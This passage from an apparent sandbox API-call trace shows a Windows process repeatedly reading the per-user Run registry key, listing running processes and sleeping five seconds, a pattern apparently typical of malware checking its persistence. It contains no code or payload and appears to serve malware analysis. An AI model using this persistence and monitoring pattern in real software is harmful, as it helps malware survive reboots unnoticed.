Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.474] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.474] NtClose (Handle=0x154) returned 0x0 [0182.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.490] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.490] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.491] NtClose (Handle=0x154) returned 0x0 [0182.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.505] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.505] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.505] NtClose (Handle=0x154) returned 0x0 [0182.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.520] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.520] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.521] NtClose (Handle=0x154) returned 0x0 [0182.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.525] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.546] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.546] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.546] NtClose (Handle=0x154) returned 0x0 [0182.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.550] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.551] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.552] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.552] NtClose (Handle=0x154) returned 0x0 [0182.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.567] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.567] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.568] NtClose (Handle=0x154) returned 0x0 [0182.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.572] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.583] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.583] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.583] NtClose (Handle=0x154) returned 0x0 [0182.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.601] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.601] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.601] NtClose (Handle=0x154) returned 0x0 [0182.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.617] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.618] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.618] NtClose (Handle=0x154) returned 0x0 [0182.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.622] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.633] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.633] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.633] NtClose (Handle=0x154) returned 0x0 [0182.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.645] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.645] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.645] NtClose (Handle=0x154) returned 0x0 [0182.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.649] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.661] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.661] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.661] NtClose (Handle=0x154) returned 0x0 [0182.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.666] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.676] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.676] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.677] NtClose (Handle=0x154) returned 0x0 [0182.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.678] NtFreeVirtualMemory 